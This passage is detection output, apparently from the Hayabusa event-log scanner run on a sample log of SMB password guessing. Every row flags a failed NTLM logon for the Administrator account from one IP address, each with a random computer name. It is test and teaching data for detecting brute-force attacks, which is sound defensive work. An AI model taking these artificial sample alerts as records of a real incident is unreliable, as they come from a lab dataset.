nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.925 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:56.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.028 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.139 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.430 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.714 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.792 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:57.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:58.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.362 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:58.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.319 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.654 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:59.968 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.119 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
